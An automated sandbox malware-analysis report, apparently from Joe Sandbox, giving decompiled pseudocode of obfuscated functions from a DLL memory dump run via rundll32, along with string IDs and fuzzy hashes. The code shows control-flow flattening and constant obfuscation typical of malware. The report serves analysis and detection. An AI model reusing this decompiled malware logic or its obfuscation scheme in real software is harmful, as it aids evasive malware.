                                                                        				_v560 = 0x478b;
                                                                        				_v560 = _v560 >> 4;
                                                                        				_v560 = _v560 + 0x6d64;
                                                                        				_v560 = _v560 + 0xffffa9cd;
                                                                        				_v560 = _v560 ^ 0x00004ab1;
                                                                        				_v532 = 0x9667;
                                                                        				_v532 = _v532 << 4;
                                                                        				_v532 = _v532 ^ 0x00090457;
                                                                        				_t140 = _v548;
                                                                        				_t143 = _v548;
                                                                        				_t125 = _v548;
                                                                        				_v540 = 0x3ff9;
                                                                        				_v540 = _v540 * 0x59;
                                                                        				_v540 = _v540 | 0xbbcf382b;
                                                                        				_v540 = _v540 ^ 0xbbdf4460;
                                                                        				_v536 = 0x71ad;
                                                                        				_v536 = _v536 ^ 0xa8de0853;
                                                                        				_v536 = _v536 ^ 0xa8de4efe;
                                                                        				_v544 = 0x526a;
                                                                        				_v544 = _v544 | 0x2fe28bf9;
                                                                        				_v544 = _v544 ^ 0x2fe2ff10;
                                                                        				do {
                                                                        					while(_t126 != 0xdd78c1f) {
                                                                        						if(_t126 == 0x116c8390) {
                                                                        							_t117 = E1000929E();
                                                                        							_t140 = _t117;
                                                                        							__eflags = _t117;
                                                                        							if(__eflags == 0) {
                                                                        								L9:
                                                                        								return _t141;
                                                                        							}
                                                                        							_t126 = 0x1a95d21f;
                                                                        							continue;
                                                                        						}
                                                                        						if(_t126 == 0x1326aa4f) {
                                                                        							_t120 = E10001E13(_v548, _v560, _v532, _v540,  &_v520);
                                                                        							_t144 =  &(_t144[3]);
                                                                        							_t143 = _t120;
                                                                        							_t126 = 0x217dee79;
                                                                        							continue;
                                                                        						}
                                                                        						if(_t126 == 0x1a95d21f) {
                                                                        							_t122 = E1000D44C(_t140, _v564, __eflags, _t126,  &_v520, _v556, _v552);
                                                                        							_t144 =  &(_t144[4]);
                                                                        							__eflags = _t122;
                                                                        							if(__eflags == 0) {
                                                                        								goto L9;
                                                                        							}
                                                                        							_t126 = 0x1326aa4f;
                                                                        							continue;
                                                                        						}
                                                                        						if(_t126 == 0x217dee79) {
                                                                        							_t125 = E1001C424(_t143, _v544);
                                                                        							_t126 = 0x3152545d;
                                                                        							continue;
                                                                        						}
                                                                        						if(_t126 != 0x3152545d) {
                                                                        							goto L17;
                                                                        						}
                                                                        						_v568 = 0x3661;
                                                                        						_v568 = _v568 << 0xe;
                                                                        						_v568 = _v568 * 5;
                                                                        						_v568 = _v568 + 0xbb88;
                                                                        						_v568 = _v568 ^ 0x69defb6a;
                                                                        						if(_t125 == _v568) {
                                                                        							_t141 = 1;
                                                                        						}
                                                                        						goto L9;
                                                                        					}
                                                                        					_t126 = 0x116c8390;
                                                                        					L17:
                                                                        					__eflags = _t126 - 0x64d23cb;
                                                                        				} while (__eflags != 0);
                                                                        				goto L9;
                                                                        			}



























                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: T$@"$]TR1$]TR1$a6$dm$jR$y}!$y}!
                                                                        • API String ID: 0-2886613653
                                                                        • Opcode ID: 9f8fb6bfe239287454dccb0f102526f4b7d4ba8770cf1b58457d1acbfbff7d93
                                                                        • Instruction ID: 092e755a5dcb822a0ee83699db47e88b3ee05a0ce695016b2a566ce4ce8947d0
                                                                        • Opcode Fuzzy Hash: 9f8fb6bfe239287454dccb0f102526f4b7d4ba8770cf1b58457d1acbfbff7d93
                                                                        • Instruction Fuzzy Hash: 51514571508341DFD384CF65C48541FBBE1FBC8798F144A1EF5A69A260D3B9CA898F86
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 95%
                                                                        			E1000620A(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                        				char _v4;
                                                                        				char _v8;
                                                                        				signed int _v12;
                                                                        				signed int _v16;
                                                                        				signed int _v20;
                                                                        				signed int _v24;
                                                                        				signed int _v28;
                                                                        				signed int _v32;
                                                                        				signed int _v36;
                                                                        				signed int _v40;
                                                                        				signed int _v44;
                                                                        				signed int _v48;
                                                                        				signed int _v52;
                                                                        				signed int _v56;
                                                                        				signed int _v60;
                                                                        				signed int _v64;
                                                                        				signed int _v68;
                                                                        				signed int _v72;
                                                                        				signed int _v76;
                                                                        				signed int _v80;
                                                                        				signed int _v84;
                                                                        				signed int _v88;
                                                                        				signed int _v92;
                                                                        				signed int _v96;
                                                                        				signed int _v100;
                                                                        				signed int _v104;
                                                                        				signed int _v108;
                                                                        				signed int _v112;
                                                                        				signed int _v116;
                                                                        				signed int _v120;
                                                                        				signed int _v124;
                                                                        				intOrPtr _v128;
                                                                        				signed int _v132;
                                                                        				intOrPtr _v136;
                                                                        				signed int _v140;
                                                                        				signed int _v144;
                                                                        				signed int _v148;
                                                                        				signed int _v152;
                                                                        				signed int _v156;
                                                                        				signed int _v160;
                                                                        				signed int _v164;
                                                                        				signed int _v168;
                                                                        				void* _t338;
                                                                        				intOrPtr _t364;
                                                                        				void* _t377;
                                                                        				signed int _t380;
                                                                        				intOrPtr _t386;
                                                                        				signed int _t388;
                                                                        				signed int _t389;
                                                                        				signed int _t390;
                                                                        				signed int _t391;
                                                                        				signed int _t392;
                                                                        				signed int _t393;
                                                                        				signed int _t394;
                                                                        				intOrPtr _t395;
                                                                        				void* _t422;
                                                                        				intOrPtr* _t430;
                                                                        				signed int _t433;
                                                                        				intOrPtr _t438;
                                                                        				signed int* _t440;
                                                                        				void* _t443;
                                                                        
                                                                        				_push(_a16);
                                                                        				_push(_a12);
                                                                        				_push(_a8);
                                                                        				_push(_a4);
                                                                        				_push(__edx);
                                                                        				_push(__ecx);
                                                                        				E100056B2(_t338);
                                                                        				_v80 = 0xcc9d;
                                                                        				_t440 =  &(( &_v168)[6]);
                                                                        				_t386 = 0;
                                                                        				_t433 = 0x16bff9b6;
                                                                        				_t438 = 0;
                                                                        				_t388 = 0x11;
                                                                        				_v80 = _v80 / _t388;
                                                                        				_v80 = _v80 + 0xffff11cc;
                                                                        				_v80 = _v80 ^ 0xffff7c6a;
                                                                        				_v44 = 0x1a06;
                                                                        				_v44 = _v44 << 1;
                                                                        				_v44 = _v44 ^ 0x00002b89;
                                                                        				_v160 = 0x27c9;
                                                                        				_v160 = _v160 >> 9;
                                                                        				_v160 = _v160 << 7;
                                                                        				_v160 = _v160 << 7;
                                                                        				_v160 = _v160 ^ 0x0004f334;
                                                                        				_v168 = 0x8961;
                                                                        				_v168 = _v168 + 0x1e8b;
                                                                        				_v168 = _v168 << 0x10;
                                                                        				_v168 = _v168 ^ 0xca952250;
                                                                        				_v168 = _v168 ^ 0x6d795972;
                                                                        				_v40 = 0xb8c6;
                                                                        				_t389 = 0x25;
                                                                        				_v40 = _v40 / _t389;
                                                                        				_v40 = _v40 ^ 0x00002ddd;
                                                                        				_v140 = 0xf458;
                                                                        				_v140 = _v140 + 0x660b;
                                                                        				_v140 = _v140 << 0xd;
                                                                        				_t390 = 0x3b;
                                                                        				_v140 = _v140 / _t390;
                                                                        				_v140 = _v140 ^ 0x00bbd1d1;
                                                                        				_v84 = 0x2cf9;
                                                                        				_v84 = _v84 ^ 0xe2cb4fb4;
                                                                        				_v84 = _v84 | 0x3d81796a;
                                                                        				_v84 = _v84 ^ 0xffcb5ef8;
                                                                        				_v156 = 0xe047;
                                                                        				_v156 = _v156 + 0xec23;
                                                                        				_v156 = _v156 | 0xc96a13e4;
                                                                        				_v156 = _v156 ^ 0x1a962ea6;
                                                                        				_v156 = _v156 ^ 0xd3fdba9b;
                                                                        				_v108 = 0x4236;
                                                                        				_v108 = _v108 >> 8;
                                                                        				_v108 = _v108 + 0xffff4e26;
                                                                        				_v108 = _v108 ^ 0xffff2512;
                                                                        				_v24 = 0xcb45;
                                                                        				_t391 = 0x77;
                                                                        				_v24 = _v24 * 0xf;
                                                                        				_v24 = _v24 ^ 0x000bb0ab;
                                                                        				_v100 = 0xb258;
                                                                        				_v100 = _v100 * 0x6b;
                                                                        				_v100 = _v100 / _t391;
                                                                        				_v100 = _v100 ^ 0x0000cac4;
                                                                        				_v16 = 0xab6c;
                                                                        				_v16 = _v16 + 0x630c;
                                                                        				_v16 = _v16 ^ 0x0001587e;
                                                                        				_v20 = 0xcdcd;
                                                                        				_v20 = _v20 + 0xffff01ab;
                                                                        				_v20 = _v20 ^ 0xfffff9e5;
                                                                        				_v60 = 0xefa6;
                                                                        				_t392 = 0x4c;
                                                                        				_v60 = _v60 * 0x26;
                                                                        				_v60 = _v60 ^ 0x0023a95c;
                                                                        				_v112 = 0x9292;
                                                                        				_v112 = _v112 + 0xffff5686;
                                                                        				_v112 = _v112 / _t392;
                                                                        				_v112 = _v112 ^ 0x035e352f;
                                                                        				_v96 = 0x9b3d;
                                                                        				_v96 = _v96 + 0xb399;
                                                                        				_v96 = _v96 + 0xffffc9ce;
                                                                        				_v96 = _v96 ^ 0x000113bb;
                                                                        				_v152 = 0x851e;
                                                                        				_v152 = _v152 + 0x4a3f;
                                                                        				_v152 = _v152 | 0x2010aaec;
                                                                        				_t393 = 0xa;
                                                                        				_v152 = _v152 * 0x5f;
                                                                        				_v152 = _v152 ^ 0xe64968ad;
                                                                        				_v124 = 0x3cc7;
                                                                        				_v124 = _v124 << 0xe;
                                                                        				_v124 = _v124 + 0x9bc0;
                                                                        				_v124 = _v124 ^ 0x0f321da8;
                                                                        				_v116 = 0xd63e;
                                                                        				_v116 = _v116 + 0x90bc;
                                                                        				_v116 = _v116 * 0x13;
                                                                        				_v116 = _v116 ^ 0x001aea95;
                                                                        				_v32 = 0xbd6a;
                                                                        				_v32 = _v32 | 0xd1e4c041;
                                                                        				_v32 = _v32 ^ 0xd1e4a4ec;
                                                                        				_v88 = 0xac52;
                                                                        				_v88 = _v88 | 0x10312b45;
                                                                        				_v88 = _v88 * 0x50;
                                                                        				_v88 = _v88 ^ 0x0f86db5e;
                                                                        				_v52 = 0xe981;
                                                                        				_v52 = _v52 | 0xae117bb0;
                                                                        				_v52 = _v52 ^ 0xae11932c;
                                                                        				_v144 = 0x1dfb;
                                                                        				_v144 = _v144 | 0x48b114e1;
                                                                        				_v144 = _v144 + 0xfffff9cd;
                                                                        				_v144 = _v144 >> 3;
                                                                        				_v144 = _v144 ^ 0x0916476d;
                                                                        				_v56 = 0xf206;
                                                                        				_v56 = _v56 >> 9;
                                                                        				_v56 = _v56 ^ 0x00005f8d;
                                                                        				_v92 = 0xe052;
                                                                        				_v92 = _v92 + 0x2471;
                                                                        				_v92 = _v92 + 0xffffdbed;
                                                                        				_v92 = _v92 ^ 0x0000938e;
                                                                        				_v68 = 0xe0f9;
                                                                        				_v68 = _v68 * 0x31;
                                                                        				_v68 = _v68 + 0xffff857e;
                                                                        				_v68 = _v68 ^ 0x002a9bd7;
                                                                        				_v48 = 0x94fa;
                                                                        				_v48 = _v48 / _t393;
                                                                        				_v48 = _v48 ^ 0x00004295;
                                                                        				_v132 = 0xaea7;
                                                                        				_v132 = _v132 | 0xc9193032;
                                                                        				_v132 = _v132 ^ 0x9bfcaca0;
                                                                        				_v132 = _v132 + 0xffff6354;
                                                                        				_v132 = _v132 ^ 0x52e462fc;
                                                                        				_v76 = 0xa7e3;
                                                                        				_v76 = _v76 | 0xf0f94981;
                                                                        				_v76 = _v76 + 0xffff9c41;
                                                                        				_v76 = _v76 ^ 0xf0f9e006;
                                                                        				_v164 = 0x36ff;
                                                                        				_v164 = _v164 + 0xffff2d0d;
                                                                        				_v164 = _v164 + 0x7fd2;
                                                                        				_t394 = 0x7d;
                                                                        				_v164 = _v164 * 0x77;
                                                                        				_v164 = _v164 ^ 0xfff2f01d;
                                                                        				_v120 = 0xc712;
                                                                        				_v120 = _v120 | 0x5aa592ba;
                                                                        				_v120 = _v120 + 0x46e1;
                                                                        				_v120 = _v120 ^ 0x5aa67fba;
                                                                        				_v28 = 0x86a8;
                                                                        				_t395 = _v136;
                                                                        				_v28 = _v28 / _t394;
                                                                        				_v28 = _v28 ^ 0x0000629f;
                                                                        				_v36 = 0xa6d4;
                                                                        				_v36 = _v36 + 0xffffc65c;
                                                                        				_v36 = _v36 ^ 0x00006d44;
                                                                        				_v72 = 0x4693;
                                                                        				_v72 = _v72 | 0x8261f221;
                                                                        				_v72 = _v72 >> 7;
                                                                        				_v72 = _v72 ^ 0x0104c1d4;
                                                                        				_v104 = 0x1547;
                                                                        				_v104 = _v104 >> 9;
                                                                        				_v104 = _v104 * 0x6e;
                                                                        				_v104 = _v104 ^ 0x0000044d;
                                                                        				_v148 = 0xcfb0;
                                                                        				_v148 = _v148 >> 6;
                                                                        				_v148 = _v148 | 0xbecf16fe;
                                                                        				_v148 = _v148 ^ 0xbecf17ff;
                                                                        				_v64 = 0x449d;
                                                                        				_v64 = _v64 << 0xd;
                                                                        				_v64 = _v64 * 0x30;
                                                                        				_v64 = _v64 ^ 0x9bae0001;
                                                                        				_t430 = _v12;
                                                                        				while(1) {
                                                                        					L1:
                                                                        					_t364 = _v128;
                                                                        					while(1) {
                                                                        						_t422 = 0x1994d475;
                                                                        						while(1) {
                                                                        							L3:
                                                                        							_t443 = _t433 - _t422;
                                                                        							if(_t443 > 0) {
                                                                        								goto L20;
                                                                        							}
                                                                        							L4:
                                                                        							if(_t443 == 0) {
                                                                        								E10015963(_a16, _v148, _t438, _v92, _v68);
                                                                        								_t440 =  &(_t440[3]);
                                                                        								goto L19;
                                                                        							} else {
                                                                        								if(_t433 == 0x18ba6df) {
                                                                        									_t430 = _t430 + 0x2c;
                                                                        									asm("sbb esi, esi");
                                                                        									_t433 = (_t433 & 0x01739b49) + 0x4550e01;
                                                                        									continue;
                                                                        								} else {
                                                                        									if(_t433 == 0x2f8e7bf) {
                                                                        										_t377 = E10012249(_a12, _v40, _t395, _t395, _v140, _v84, _v156, _v108, _t386, _t395, _t395, _v24, _t395,  &_v12, _t395,  &_v8);
                                                                        										_t440 =  &(_t440[0xe]);
                                                                        										if(_t377 == 0) {
                                                                        											L19:
                                                                        											_t433 = 0x4550e01;
                                                                        											goto L13;
                                                                        										} else {
                                                                        											_t380 = E10017B6B();
                                                                        											_t433 = 0x5c8a94a;
                                                                        											_t364 = _v12 * 0x2c + _t386;
                                                                        											_v128 = _t364;
                                                                        											_t430 =  >=  ? _t386 : (_t380 & 0x0000001f) * 0x2c + _t386;
                                                                        											goto L14;
                                                                        										}
                                                                        										L33:
                                                                        										return _t364;
                                                                        									} else {
                                                                        										if(_t433 == 0x4550e01) {
                                                                        											_t296 =  &_v48; // 0x6d44
                                                                        											E100091CD( *_t296, _v132, _v76, _t438, _v164);
                                                                        											_t440 =  &(_t440[3]);
                                                                        											_t433 = 0x2fd49dd4;
                                                                        											L13:
                                                                        											_t364 = _v128;
                                                                        											L14:
                                                                        											_t395 = _v136;
                                                                        											_t422 = 0x1994d475;
                                                                        											continue;
                                                                        										} else {
                                                                        											if(_t433 == 0x5c8a94a) {
                                                                        												_t395 = E10017C1D(_v20, _v60, _a12,  *_t430, _v64, _v112);
                                                                        												_t440 =  &(_t440[4]);
                                                                        												_v136 = _t395;
                                                                        												_t433 =  !=  ? 0x2d7fc8f5 : 0x18ba6df;
                                                                        												goto L1;
                                                                        											} else {
                                                                        												if(_t433 == 0x16bff9b6) {
                                                                        													_t433 = 0x1a134602;
                                                                        													while(1) {
                                                                        														L3:
                                                                        														_t443 = _t433 - _t422;
                                                                        														if(_t443 > 0) {
                                                                        															goto L20;
                                                                        														}
                                                                        														goto L4;
                                                                        													}
                                                                        													goto L20;
                                                                        												}
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        							L30:
                                                                        							if(_t433 != 0x399cbc9a) {
                                                                        								_t364 = _v128;
                                                                        								_t395 = _v136;
                                                                        								continue;
                                                                        							}
                                                                        							goto L33;
                                                                        							L20:
                                                                        							if(_t433 == 0x1a134602) {
                                                                        								_push(_t395);
                                                                        								_t364 = E100157E8(0x20000);
                                                                        								_t386 = _t364;
                                                                        								if(_t386 == 0) {
                                                                        									_t433 = 0x399cbc9a;
                                                                        									goto L29;
                                                                        								} else {
                                                                        									_t433 = 0x34bb9491;
                                                                        									goto L13;
                                                                        								}
                                                                        							} else {
                                                                        								_t364 = 0x2d7fc8f5;
                                                                        								if(_t433 == 0x2d7fc8f5) {
                                                                        									E1001ECE3( &_v4, _v96, _v104, _v152, _t438, _v124, _t395, _t395, _v116, _v32);
                                                                        									_t433 =  !=  ? 0x1994d475 : 0x18ba6df;
                                                                        									_t364 = E1001F23C(_v88, _v136, _v52, _v144, _v56);
                                                                        									_t440 =  &(_t440[0xb]);
                                                                        									L29:
                                                                        									_t422 = 0x1994d475;
                                                                        								} else {
                                                                        									if(_t433 == 0x2fd49dd4) {
                                                                        										return E100091CD(_v120, _v28, _v36, _t386, _v72);
                                                                        									}
                                                                        									if(_t433 == 0x34bb9491) {
                                                                        										_push(_t395);
                                                                        										_t438 = E100157E8(0x2000);
                                                                        										_t433 =  !=  ? 0x2f8e7bf : 0x2fd49dd4;
                                                                        										goto L13;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        							goto L30;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        			}

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: #$6B$?J$Dmw$RESCDIR$q$$rYym$F
                                                                        • API String ID: 0-1064706702
                                                                        • Opcode ID: dfc4d2b2e54516939d1a7f582ef6859113f7f42e62d469bc69eaab2396b0028c
                                                                        • Instruction ID: 12a8db86310814296b6cd3691f3c08f104cbabb9bff823363e51c79446ee3229
                                                                        • Opcode Fuzzy Hash: dfc4d2b2e54516939d1a7f582ef6859113f7f42e62d469bc69eaab2396b0028c
                                                                        • Instruction Fuzzy Hash: 531235729083809FE368CF24C985A4FBBE2FBC5754F108A1DE5D9962A0D7B59908CF43
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 90%
                                                                        			E10002DEE(signed int __ecx, intOrPtr* __edx) {
                                                                        				char _v520;
                                                                        				char _v1040;
                                                                        				char _v1560;
                                                                        				signed int _v1564;
                                                                        				signed int _v1568;
                                                                        				signed int _v1572;
                                                                        				signed int _v1576;
                                                                        				signed int _v1580;
                                                                        				signed int _v1584;
                                                                        				signed int _v1588;
                                                                        				signed int _v1592;
                                                                        				signed int _v1596;
                                                                        				signed int _v1600;
                                                                        				signed int _v1604;
                                                                        				signed int _v1608;
                                                                        				unsigned int _v1612;
                                                                        				signed int _v1616;
                                                                        				signed int _v1620;
                                                                        				signed int _v1624;
                                                                        				signed int _v1628;
                                                                        				signed int _v1632;
                                                                        				signed int _v1636;
                                                                        				signed int _v1640;
                                                                        				signed int _v1644;
                                                                        				signed int _v1648;
                                                                        				signed int _v1652;
                                                                        				signed int _v1656;
                                                                        				signed int _v1660;
                                                                        				signed int _v1664;
                                                                        				signed int _v1668;
                                                                        				signed int _v1672;
                                                                        				signed int _v1676;
                                                                        				intOrPtr _t312;
                                                                        				intOrPtr _t315;
                                                                        				signed int _t317;
                                                                        				signed int _t328;
                                                                        				signed int _t330;
                                                                        				signed int _t331;
                                                                        				signed int _t332;
                                                                        				signed int _t333;
                                                                        				signed int _t334;
                                                                        				signed int _t335;
                                                                        				signed int _t336;
                                                                        				signed int _t337;
                                                                        				signed int _t338;
                                                                        				signed int _t339;
                                                                        				void* _t340;
                                                                        				signed int _t376;
                                                                        				void* _t377;
                                                                        				signed int _t380;
                                                                        				intOrPtr* _t384;
                                                                        				signed int* _t385;
                                                                        
                                                                        				_t385 =  &_v1676;
                                                                        				_v1652 = 0xab2a;
                                                                        				_v1652 = _v1652 + 0xffff495e;
                                                                        				_v1652 = _v1652 << 6;
                                                                        				_v1652 = _v1652 * 0x69;
                                                                        				_t384 = __edx;
                                                                        				_v1652 = _v1652 ^ 0xfed2f229;
                                                                        				_v1584 = 0x9d53;
                                                                        				_t328 = __ecx;
                                                                        				_v1584 = _v1584 + 0xa330;
                                                                        				_t377 = 0xee39a7c;
                                                                        				_v1584 = _v1584 ^ 0x000172e7;
                                                                        				_v1592 = 0xcdb9;
                                                                        				_t330 = 0x11;
                                                                        				_v1592 = _v1592 * 0x36;
                                                                        				_v1592 = _v1592 ^ 0x002b5ef0;
                                                                        				_v1576 = 0x10e6;
                                                                        				_v1576 = _v1576 ^ 0xbdc8c8ad;
                                                                        				_v1576 = _v1576 ^ 0xbdc8e062;
                                                                        				_v1616 = 0x2d0;
                                                                        				_v1616 = _v1616 << 2;
                                                                        				_v1616 = _v1616 >> 4;
                                                                        				_v1616 = _v1616 ^ 0x00001000;
                                                                        				_v1564 = 0x56a7;
                                                                        				_v1564 = _v1564 / _t330;
                                                                        				_v1564 = _v1564 ^ 0x000075e6;
                                                                        				_v1668 = 0x8a0a;
                                                                        				_v1668 = _v1668 ^ 0xf9b8a5a3;
                                                                        				_v1668 = _v1668 >> 4;
                                                                        				_v1668 = _v1668 << 8;
                                                                        				_v1668 = _v1668 ^ 0x9b82d072;
                                                                        				_v1608 = 0x1b3c;
                                                                        				_v1608 = _v1608 << 3;
                                                                        				_t331 = 0x19;
                                                                        				_v1608 = _v1608 * 0x7b;
                                                                        				_v1608 = _v1608 ^ 0x006884bb;
                                                                        				_v1660 = 0x34f3;
                                                                        				_v1660 = _v1660 ^ 0x817c71db;
                                                                        				_v1660 = _v1660 << 0xc;
                                                                        				_v1660 = _v1660 + 0xee26;
                                                                        				_v1660 = _v1660 ^ 0xc4532971;
                                                                        				_v1636 = 0xf8a9;
                                                                        				_v1636 = _v1636 | 0xff2fbebc;
                                                                        				_v1636 = _v1636 * 9;
                                                                        				_v1636 = _v1636 ^ 0xf8afb852;
                                                                        				_v1620 = 0xbdfe;
                                                                        				_v1620 = _v1620 / _t331;
                                                                        				_v1620 = _v1620 + 0xcd35;
                                                                        				_v1620 = _v1620 ^ 0x0000b0b7;
                                                                        				_v1612 = 0xc643;
                                                                        				_v1612 = _v1612 >> 2;
                                                                        				_v1612 = _v1612 + 0xffff2544;
                                                                        				_v1612 = _v1612 ^ 0xffff1dfd;
                                                                        				_v1596 = 0xa7ff;
                                                                        				_v1596 = _v1596 + 0xffffdda0;
                                                                        				_v1596 = _v1596 ^ 0x0000ce4c;
                                                                        				_v1588 = 0x97f4;
                                                                        				_v1588 = _v1588 >> 0xb;
                                                                        				_v1588 = _v1588 ^ 0x00000d4c;
                                                                        				_v1624 = 0xc45e;
                                                                        				_t332 = 0x3c;
                                                                        				_v1624 = _v1624 / _t332;
                                                                        				_v1624 = _v1624 ^ 0xe4d01b6a;
                                                                        				_v1624 = _v1624 ^ 0xe4d071e7;
                                                                        				_v1628 = 0x92d6;
                                                                        				_v1628 = _v1628 >> 2;
                                                                        				_v1628 = _v1628 | 0xb4e3a315;
                                                                        				_v1628 = _v1628 ^ 0xb4e38f21;
                                                                        				_v1676 = 0x6ce6;
                                                                        				_t333 = 0x62;
                                                                        				_v1676 = _v1676 / _t333;
                                                                        				_t334 = 0x5b;
                                                                        				_v1676 = _v1676 * 0xb;
                                                                        				_v1676 = _v1676 + 0xffffdd0c;
                                                                        				_v1676 = _v1676 ^ 0xffff8d43;
                                                                        				_v1568 = 0x788f;
                                                                        				_v1568 = _v1568 | 0x01d52ab2;
                                                                        				_v1568 = _v1568 ^ 0x01d55070;
                                                                        				_v1580 = 0xac01;
                                                                        				_v1580 = _v1580 | 0x939dc85b;
                                                                        				_v1580 = _v1580 ^ 0x939d96e7;
                                                                        				_v1644 = 0x4f10;
                                                                        				_v1644 = _v1644 * 0x6c;
                                                                        				_v1644 = _v1644 | 0x48f07e2e;
                                                                        				_v1644 = _v1644 >> 9;
                                                                        				_v1644 = _v1644 ^ 0x00245a10;
                                                                        				_v1656 = 0xfccd;
                                                                        				_v1656 = _v1656 ^ 0x0dc9b737;
                                                                        				_v1656 = _v1656 << 8;
                                                                        				_v1656 = _v1656 | 0x5beff8b5;
                                                                        				_v1656 = _v1656 ^ 0xdbefe6c8;
                                                                        				_v1572 = 0x60e1;
                                                                        				_v1572 = _v1572 / _t334;
                                                                        				_v1572 = _v1572 ^ 0x000055cd;
                                                                        				_v1604 = 0x4c8;
                                                                        				_t335 = 0x33;
                                                                        				_v1604 = _v1604 / _t335;
                                                                        				_v1604 = _v1604 ^ 0x56d62181;
                                                                        				_v1604 = _v1604 ^ 0x56d60377;
                                                                        				_v1664 = 0xeba7;
                                                                        				_t336 = 0x75;
                                                                        				_v1664 = _v1664 / _t336;
                                                                        				_v1664 = _v1664 + 0x2263;
                                                                        				_t337 = 0x6a;
                                                                        				_v1664 = _v1664 / _t337;
                                                                        				_v1664 = _v1664 ^ 0x00006206;
                                                                        				_v1672 = 0xe4de;
                                                                        				_v1672 = _v1672 * 6;
                                                                        				_v1672 = _v1672 ^ 0xd03d2876;
                                                                        				_v1672 = _v1672 ^ 0x484383cd;
                                                                        				_v1672 = _v1672 ^ 0x987bff54;
                                                                        				_v1632 = 0x7003;
                                                                        				_v1632 = _v1632 >> 0xf;
                                                                        				_v1632 = _v1632 ^ 0x6ec815ff;
                                                                        				_v1632 = _v1632 + 0xffffbce8;
                                                                        				_v1632 = _v1632 ^ 0x6ec7acef;
                                                                        				_v1640 = 0x9135;
                                                                        				_v1640 = _v1640 ^ 0x0aba72c7;
                                                                        				_v1640 = _v1640 | 0xda9e3ffa;
                                                                        				_t338 = 7;
                                                                        				_v1640 = _v1640 / _t338;
                                                                        				_v1640 = _v1640 ^ 0x1f3ffeda;
                                                                        				_v1648 = 0xbacf;
                                                                        				_v1648 = _v1648 >> 0xd;
                                                                        				_t339 = 0x17;
                                                                        				_v1648 = _v1648 / _t339;
                                                                        				_v1648 = _v1648 << 0xc;
                                                                        				_v1648 = _v1648 ^ 0x0000584d;
                                                                        				_v1600 = 0xeac1;
                                                                        				_v1600 = _v1600 * 0x77;
                                                                        				_v1600 = _v1600 ^ 0x006d5ca6;
                                                                        				_t376 = _v1600;
                                                                        				while(_t377 != 0x5fcbc3f) {
                                                                        					if(_t377 != 0xee39a7c) {
                                                                        						if(_t377 == 0x11ea9c68) {
                                                                        							_push( &_v520);
                                                                        							_t317 = E10002628(_t328, _t384);
                                                                        							asm("sbb esi, esi");
                                                                        							_t339 = 0x100012f8;
                                                                        							_t380 =  ~_t317 & 0x1fda4e6f;
                                                                        							goto L7;
                                                                        						} else {
                                                                        							if(_t377 == 0x1790ebe1) {
                                                                        								return E100091CD(_v1632, _v1640, _v1648, _t376, _v1600);
                                                                        							}
                                                                        							_t394 = _t377 - 0x376b3a50;
                                                                        							if(_t377 != 0x376b3a50) {
                                                                        								L12:
                                                                        								__eflags = _t377 - 0x7fc7711;
                                                                        								if(_t377 != 0x7fc7711) {
                                                                        									continue;
                                                                        								} else {
                                                                        									return _t317;
                                                                        								}
                                                                        								L16:
                                                                        							} else {
                                                                        								_push(_t339);
                                                                        								E10001D54(_v1576, _t339, _v1616, _v1564, _v1668,  &_v1560, _v1608, _v1652);
                                                                        								_push(0x10001368);
                                                                        								_push(_v1620);
                                                                        								E100163BF(E1001BF25(_v1660, _v1636, _t394), _t394, _v1596, _v1588,  &_v1040, _v1660, _v1624,  &_v1560,  &_v520, _v1628);
                                                                        								E1001C5F7(_v1676, _v1568, _v1580, _v1644, _t321);
                                                                        								_push(_v1672);
                                                                        								_push(0);
                                                                        								_push( &_v1040);
                                                                        								_push(0);
                                                                        								_push(_v1664);
                                                                        								_push(_v1604);
                                                                        								_push(0);
                                                                        								_push(0);
                                                                        								_t339 = _v1656;
                                                                        								_t317 = E100189F6(_t339, _v1572, _t394);
                                                                        								_t385 =  &(_t385[0x1d]);
                                                                        								asm("sbb esi, esi");
                                                                        								_t380 =  ~_t317 & 0xee6bd05e;
                                                                        								L7:
                                                                        								_t377 = _t380 + 0x1790ebe1;
                                                                        								continue;
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					_t340 = 0x24;
                                                                        					_t315 = E100157E8(_t340);
                                                                        					_t376 = _t315;
                                                                        					_t339 = _t339;
                                                                        					__eflags = _t376;
                                                                        					if(_t376 != 0) {
                                                                        						_t377 = 0x11ea9c68;
                                                                        						continue;
                                                                        					}
                                                                        					return _t315;
                                                                        					goto L16;
                                                                        				}
                                                                        				 *((intOrPtr*)(_t376 + 0x20)) = _t328;
                                                                        				_t377 = 0x7fc7711;
                                                                        				_t312 =  *0x10021400; // 0x0
                                                                        				 *((intOrPtr*)(_t376 + 0x10)) = _t312;
                                                                        				 *0x10021400 = _t376;
                                                                        				goto L12;
                                                                        			}























































                                                                        0x10003176
                                                                        0x1000317e
                                                                        0x1000318e
                                                                        0x10003193
                                                                        0x10003199
                                                                        0x100031a1
                                                                        0x100031a9
                                                                        0x100031b2
                                                                        0x100031b5
                                                                        0x100031b9
                                                                        0x100031be
                                                                        0x100031c6
                                                                        0x100031d3
                                                                        0x100031d7
                                                                        0x100031df
